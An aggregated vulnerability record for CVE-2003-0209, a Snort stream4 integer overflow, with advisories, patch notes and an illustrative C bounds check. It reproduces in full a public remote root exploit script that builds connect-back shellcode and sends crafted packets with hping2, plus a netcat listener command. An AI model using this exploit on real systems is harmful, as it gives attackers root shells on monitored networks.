CVE-2003-0209
CVSS10.0
Published: 2003-05-05 00:00:00
Revised: 2016-10-17 22:30:41

[Original text] Integer overflow in the TCP stream reassembly module (stream4) for Snort 2.0 and earlier allows remote attackers to execute arbitrary code via large sequence numbers in packets, which enable a heap-based buffer overflow.


[CNNVD] Snort TCP Stream Reassembly Preprocessor Remote Integer Overflow Leading to Heap Buffer Overflow Vulnerability (CNNVD-200305-004)

        
        Snort is a popular open-source network intrusion detection system.
        The stream4 preprocessor module contains an integer overflow when computing the offset of reassembled stream data. A remote attacker can use it to overflow a heap buffer in the Snort process and may execute arbitrary instructions on the system with the privileges of the Snort process.
        The stream4 preprocessor is the plugin that reassembles TCP traffic before Snort analyzes packets; it is also used to detect several kinds of IDS evasion attacks. While computing the offset of reassembled stream data, the module overflows a 32-bit integer variable, which can lead to heap corruption. To exploit this vulnerability the attacker does not need to know which host the Snort sensor runs on; carefully constructed TCP packets alone may allow arbitrary instructions to be executed on the system with the privileges of the Snort process (usually root).
        
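To illustrate the bug class the description names (an offset derived from TCP sequence numbers in 32-bit arithmetic and then used to index a heap reassembly buffer), here is an added, constructed C example that is not Snort's code: the unchecked arithmetic beside a bounds check done in 64-bit space. The function names (`naive_end_offset`, `checked_offset`, `reassemble_segment`, `demo`) and the sample sequence numbers are invented for the illustration; the check also shows that a legitimate TCP sequence-number wrap is still accepted.

```c
/* Constructed illustration of the bug class: a TCP reassembler derives a
 * write offset into a heap buffer from sequence numbers. Not Snort's code. */
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Unsafe: end offset of a segment in plain 32-bit arithmetic.  A forged
 * sequence number makes the result wrap and look small and in-bounds. */
uint32_t naive_end_offset(uint32_t base_seq, uint32_t seg_seq, uint16_t seg_len)
{
    uint32_t off = seg_seq - base_seq;  /* modular subtraction */
    return off + seg_len;               /* can wrap past 2^32 */
}

/* Hardened: keep modular subtraction (TCP sequence space legitimately wraps),
 * but do the range test in 64 bits so off + len cannot wrap, and reject any
 * segment that would not fit inside the allocated reassembly buffer. */
bool checked_offset(uint32_t base_seq, uint32_t seg_seq, uint16_t seg_len,
                    uint32_t buf_size, uint32_t *out_off)
{
    uint32_t off = seg_seq - base_seq;
    if ((uint64_t)off + seg_len > buf_size)
        return false;                   /* before base_seq, or past the window */
    *out_off = off;
    return true;
}

/* Copy a segment into the heap reassembly buffer only if the check passes.
 * Returns 1 if copied, 0 if the segment was rejected. */
int reassemble_segment(uint8_t *buf, uint32_t buf_size, uint32_t base_seq,
                       uint32_t seg_seq, const uint8_t *data, uint16_t len)
{
    uint32_t off;
    if (!checked_offset(base_seq, seg_seq, len, buf_size, &off))
        return 0;
    memcpy(buf + off, data, len);
    return 1;
}

/* Constructed scenario: a 4 KiB window with base sequence 0x10.  Segment one
 * is in range; segment two claims to start 4 bytes before the base, which the
 * naive arithmetic turns into an end offset of 4, an apparently valid index. */
int demo(void)
{
    uint8_t *win = calloc(4096, 1);
    const uint8_t payload[] = "ABCDEFGH";
    int ok  = reassemble_segment(win, 4096, 0x10, 0x10, payload, 8);   /* 1 */
    int bad = reassemble_segment(win, 4096, 0x10, 0x0c, payload, 8);   /* 0 */
    free(win);
    return ok == 1 && bad == 0 && naive_end_offset(0x10, 0x0c, 8) == 4;
}
```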

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:sourcefire:snort:1.8.5
cpe:/a:sourcefire:snort:1.8.3
cpe:/a:sourcefire:snort:1.8
cpe:/a:sourcefire:snort:1.8.6
cpe:/a:sourcefire:snort:1.8.1
cpe:/a:sourcefire:snort:1.8.2
cpe:/a:sourcefire:snort:1.9.1
cpe:/a:smoothwall:smoothwall:2.0_beta_4
cpe:/a:sourcefire:snort:1.8.4
cpe:/a:sourcefire:snort:1.8.7
cpe:/a:sourcefire:snort:1.9

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0209
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0209
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-004
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105043563016235&w=2
(UNKNOWN)  BUGTRAQ  20030415 CORE-2003-0307: Snort TCP Stream Reassembly Integer Overflow Vulnerability
http://marc.info/?l=bugtraq&m=105103586927007&w=2
(UNKNOWN)  BUGTRAQ  20030422 GLSA: snort (200304-05)
http://marc.info/?l=bugtraq&m=105111217731583&w=2
(UNKNOWN)  BUGTRAQ  20030423 Snort <=1.9.1 exploit
http://marc.info/?l=bugtraq&m=105154530427824&w=2
(UNKNOWN)  BUGTRAQ  20030428 GLSA: snort (200304-06)
http://marc.info/?l=bugtraq&m=105172790914107&w=2
(UNKNOWN)  ENGARDE  ESA-20030430-013
http://www.cert.org/advisories/CA-2003-13.html
(UNKNOWN)  CERT  CA-2003-13
http://www.coresecurity.com/common/showdoc.php?idx=313&idxseccion=10
(UNKNOWN)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=313&idxseccion=10
http://www.debian.org/security/2003/dsa-297
(UNKNOWN)  DEBIAN  DSA-297
http://www.kb.cert.org/vuls/id/139129
(VENDOR_ADVISORY)  CERT-VN  VU#139129
http://www.mandriva.com/security/advisories?name=MDKSA-2003:052
(UNKNOWN)  MANDRAKE  MDKSA-2003:052
http://www.securityfocus.com/bid/7178
(VENDOR_ADVISORY)  BID  7178

- Vulnerability information

Snort TCP Stream Reassembly Preprocessor Remote Integer Overflow Leading to Heap Buffer Overflow Vulnerability
Critical  Other
2003-05-05 00:00:00 2006-08-24 00:00:00
Remote

- Advisories and patches

        Vendor patch:
        Martin Roesch
        -------------
        The vendor has released an upgrade that fixes this security issue. Download Snort 2.0 from the vendor's homepage:
        
        http://www.snort.org/dl/snort-2.0.0.tar.gz

- Vulnerability information (18)

Snort <=1.9.1 Remote Root Exploit (p7snort191.sh) (EDBID:18)
linux remote
2003-04-23 Verified
0 truff
N/A
#!/bin/sh

##########################################################
# p7snort191.sh by truff (truff@projet7.org)             #
# Snort 1.9.1 and below remote exploit                   #
#                                                        #
# Tested on Slackware 8.0 with Snort 1.9.1 from sources  #
#                                                        #
# Usage:                                                 #
# 1/ Launch a listening netcat to listen for the shell   #
# nc -p 45295 -l                                         #
#                                                        #
# 2/ p7snort119.sh yourIP [Ret_Addr]                     #
#                                                        #
# Where yourIP is the IP where the netcat is listening   #
# and Ret_Addr is the address (8 hexa digits) of the     #
# shellcode (eg: 0819fec2)                               #
#                                                        #
#                                                        #
# This vulnerability was discovered by Bruce Leidl,      #
# Juan Pablo Martinez Kuhn, and Alejandro David Weil     #
# from Core Security Technologies during Bugweek 2003.   #
#                                                        #
# Greetz to #root people and projet7 members.            #
# Special thx to mycroft for helping me with shell       #
# scripting stuff.                                       #
#                                                        #
# www.projet7.org - Security Researchs -                 #
##########################################################


# Put here the path to your hping2 binary
HPING2=/usr/sbin/hping2

# You should change these params to make the snort sensor 
# capture the packets.
IPSRC=192.168.22.1
IPDST=192.168.22.2
PTSRC=3339
PTDST=111



echo "p7snort191.sh by truff (truff@projet7.org)"

case $# in
0)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
1)
RET=0819fec2
echo "Using default retaddr (Slackware 8.0)"
echo $RET
;;
2)
RET=$2
echo "Using custom retaddr"
echo $RET
;;
*)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
esac



# Nops
i=0
while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1)
echo -n -e "\x90" >> egg
done


# linux x86 shellcode by eSDee of Netric (www.netric.org)
# 131 byte - connect back shellcode (port=0xb0ef)
echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg
echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg
echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg
echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg
echo -n -e "\x68" >> egg

# IP here 
echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \
$(echo $1 | cut -d. -f2) \
$(echo $1 | cut -d. -f3) \
$(echo $1 | cut -d. -f4)) >> egg

echo -n -e "\x66\x68\xb0" >> egg
echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg
echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg
echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg 
echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg
echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg
echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg
echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg
echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg
echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg
echo -n -e "\x01\xcd\x80" >> egg

# 3 dummy bytes for alignment purposes
echo -n -e "\x41\x41\x41" >> egg

i=0
cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4)


var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2)

while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1)
echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg
done


# hping ruleZ
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null

$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null

$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \
-d 0 --setseq 0xc0c4c014 --setack 0xffffffff \
1>/dev/null 2>/dev/null

rm egg

echo "Exploit Sended"

# milw0rm.com [2003-04-23]
		

- Vulnerability information

4444
Snort stream4 Reassemble Module Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Upgrade
Exploit Public Vendor Verified

- Vulnerability description

Snort IDS contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in the stream4 reassemble module that does not properly sanitize input buffers. If an attacker sends a specially crafted set of packets they may be able to execute arbitrary code via a heap overflow.

- Timeline

2003-04-15 2003-03-03
2003-04-15 Unknown

- Solution

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: disable the stream4 preprocessor by editing snort.conf and replacing any lines that begin with "preprocessor stream4" with "# preprocessor stream4".

- Related references

- Vulnerability author

- Vulnerability information

Snort TCP Packet Reassembly Integer Overflow Vulnerability
Failure to Handle Exceptional Conditions 7178
Yes No
2003-04-15 12:00:00 2009-07-11 09:06:00
Discovery of this issue is credited to Bruce Leidl, Juan Pablo Martinez Kuhn and Alejandro David Weil from Core Security Technologies.

- Affected program versions

Snort Project Snort 1.9.1
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Snort Project Snort 1.9
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
Snort Project Snort 1.8.7
Snort Project Snort 1.8.6
Snort Project Snort 1.8.5
Snort Project Snort 1.8.4 beta1
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Snort Project Snort 1.8.4
Snort Project Snort 1.8.3
Snort Project Snort 1.8.2
Snort Project Snort 1.8.1
Snort Project Snort 1.8
+ Conectiva Linux 8.0
SmoothWall SmoothWall 2.0 beta 4
Snort Project Snort 2.0 .0rc1
Snort Project Snort 2.0

- Unaffected program versions

Snort Project Snort 2.0 .0rc1
Snort Project Snort 2.0

- Vulnerability discussion

A vulnerability has been discovered in Snort. The problem occurs during the reassembly of TCP packets by the stream4 preprocessor. By sending specially crafted fragmented packets across a network monitored by Snort, it may be possible to trigger an integer overflow. As a result, a buffer overflow may occur, effectively allowing a remote attacker to corrupt heap memory.

Successful exploitation of this issue could allow a remote attacker to execute arbitrary code on a target system.

This issue affects Snort releases prior to Snort 2.0 RC1.

- Exploit

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been made available by truff (truff@projet7.org).

- Solution

Conectiva Linux has released a security advisory (CLSA-2003:671) to address this issue. Fixes are available below. Users are advised to upgrade as soon as possible.

Guardian Digital Security has released a security advisory for EnGarde Secure Linux (ESA-20030430-013). The referenced advisory contains information pertaining to obtaining and applying fixes that address this issue. Users are advised to upgrade as soon as possible.

While NetBSD does not include Snort by default, Snort is available through pkgsrc. NetBSD users who have installed Snort packages should use pkgsrc/security/audit-packages to apply upgrades.

It is recommended that all Gentoo Linux users who are running
net-analyzer/snort upgrade to snort-2.0.0 as follows:

emerge sync
emerge snort
emerge clean

Mandrake has released a security advisory (MDKSA-2003:052) which contains fixes that address this issue. Users are advised to upgrade as soon as possible.

Debian has released a security advisory (DSA 297-1) containing fixes which address this issue. Users are advised to upgrade as soon as possible.

This issue is addressed in Snort 2.0. Users are advised to upgrade.

Fixes are available:


Snort Project Snort 1.8

Snort Project Snort 1.8.1

Snort Project Snort 1.8.2

Snort Project Snort 1.8.3

Snort Project Snort 1.8.4 beta1

Snort Project Snort 1.8.4

Snort Project Snort 1.8.5

Snort Project Snort 1.8.6

Snort Project Snort 1.8.7

Snort Project Snort 1.9

Snort Project Snort 1.9.1

SmoothWall SmoothWall 2.0 beta 4

- Related references
